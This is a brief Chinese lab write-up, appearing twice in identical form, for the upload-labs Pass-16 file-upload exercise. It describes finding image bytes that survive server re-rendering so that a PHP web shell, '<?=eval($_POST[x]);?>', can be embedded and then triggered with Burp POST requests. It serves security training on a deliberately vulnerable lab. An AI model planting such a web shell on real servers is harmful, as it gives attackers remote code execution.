工具项目地址
GitHub - Yang1k/upload-labs-Pass16
原图片upload-labs-Pass16-master\jpg\demo
此处发现phpinfo();上传通过burp进行查看,phpinfo()可以执行 然后图片保存本地与原图片对比
右边的图片为上传后图片,只需要按tab+ctrl 进行来回替换发现有变动的位置及可插入后门<?=eval($_POST[x]);?>
然后通过burp post方法进行请求
工具项目地址
GitHub - Yang1k/upload-labs-Pass16
原图片upload-labs-Pass16-master\jpg\demo
此处发现phpinfo();上传通过burp进行查看,phpinfo()可以执行 然后图片保存本地与原图片对比
右边的图片为上传后图片,只需要按tab+ctrl 进行来回替换发现有变动的位置及可插入后门<?=eval($_POST[x]);?>
然后通过burp post方法进行请求